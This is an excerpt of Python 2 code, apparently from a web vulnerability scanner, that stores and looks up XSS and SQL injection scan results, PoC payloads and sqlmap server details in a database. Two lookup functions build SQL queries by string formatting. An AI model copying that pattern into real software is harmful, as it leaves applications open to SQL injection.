260 |     request_info['accept'] = request[5]
261 |     request_info['accept_language'] = request[6]
262 |     request_info['accept_encoding'] = request[7]
263 |     request_info['cookie'] = request[8]
264 |     request_info['referer'] = request[9]
265 |     request_info['post_data'] = request[10]
266 |     request_info['path'] = request[11]
267 |     request_info['scan_xss'] = request[12]
268 |     request_info['scan_sqli'] = request[13]
269 | 
270 |     return request_info
271 | 
272 | def get_sqlmap_info(sqlmap):
273 |     """Convert raw sqlmap server info to dict
274 | 
275 |     Args:
276 |         sqlmap: raw sqlmap server info from database
277 | 
278 |     Returns:
279 |         sqlmap_info: dict
280 | 
281 |     """
282 | 
283 |     sqlmap_info = {}
284 |     sqlmap_info['ip'] = sqlmap[0]
285 |     sqlmap_info['port'] = sqlmap[1]
286 | 
287 |     return sqlmap_info
288 | 
289 | def is_checked(rid, scan_type):
290 |     """Check if the specific request has been checked before.
291 | 
292 |     Args:
293 |         rid: The rid of the request
294 |         scan_type: The scan type, e.g. scan_xss, scan_sqli
295 | 
296 |     Returns:
297 |         True for checked, False otherwise.
298 | 
299 |     """
300 | 
301 |     try:
302 |         sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 1".format(rid.strip(), scan_type)
303 |         query_result = db_query(sql)
304 |         count = [row[0] for row in query_result]
305 |         if count[0] >= 1:
306 |             return True
307 |         else:
308 |             return False
309 |     except Exception, e:
310 |         print highlight('[!] {}'.format(str(e)), 'red')
311 |         return False
312 | 
313 | def is_checked_vulnerable(rid, scan_result_type):
314 |     """Check if the specific request has been detected as vulnerable before.
315 | 
316 |     Args:
317 |         rid: The rid of the request
318 |         scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli
319 | 
320 |     Returns:
321 |         True for existed vulnerable, False otherwise.
322 | 
323 |     """
324 | 
325 |     try:
326 |         sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 'vulnerable'".format(rid.strip(), scan_result_type)
327 |         query_result = db_query(sql)
328 |         count = [row[0] for row in query_result]
329 |         if count[0] >= 1:
330 |             return True
331 |         else:
332 |             return False
333 |     except Exception, e:
334 |         print highlight('[!] {}'.format(str(e)), 'red')
335 |         return False
336 | 
337 | def update_scan_result(rid, scan_type, scan_result_type, scan_result, poc_type, poc_result, response_type, response):
338 |     """Update scanning result into database
339 | 
340 |     Args:
341 |         rid: The rid of the request
342 |         scan_type: The scan type, e.g. scan_xss, scan_sqli
343 |         scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli
344 |         scan_result: The scanning result, e.g. vulnerable, not vulnerable
345 |         poc_type: The poc type, e.g. poc_xss, poc_sqli
346 |         poc_result: The payload of poc
347 |         response_type: The response type, e.g. response_xss, response_fi, response_sqli
348 |         response: The source page of response
349 | 
350 |     """
351 |     if not is_checked_vulnerable(rid, scan_result_type):
352 |         if scan_result == "vulnerable":
353 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
354 |             table_request = 'requests'
355 |             args_request = {}
356 |             args_request[scan_type] = 1
357 |             args_request[scan_result_type] = scan_result
358 |             args_request[poc_type] = poc_result
359 |             args_request['update_time'] = now
360 |             cons_request = {}
361 |             cons_request['rid'] = rid
362 | 
363 |             table_response = 'responses'
364 |             args_response = {}
365 |             args_response['update_time'] = now
366 |             args_response[response_type] = response
367 |             cons_response = {}
368 |             cons_response['rid'] = rid
369 |         else:
370 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
371 |             table_request = 'requests'
372 |             args_request = {}
373 |             args_request[scan_type] = 1
374 |             args_request[scan_result_type] = scan_result
375 |             args_request['update_time'] = now
376 |             cons_request = {}
377 |             cons_request['rid'] = rid
378 | 
379 |             table_response = 'responses'
380 |             args_response = {}
381 |             args_response['update_time'] = now
382 |             cons_response = {}
383 |             cons_response['rid'] = rid
384 |         db_update(table_request, args_request, cons_request)
385 |         db_update(table_response, args_response, cons_response)
386 | 


--------------------------------------------------------------------------------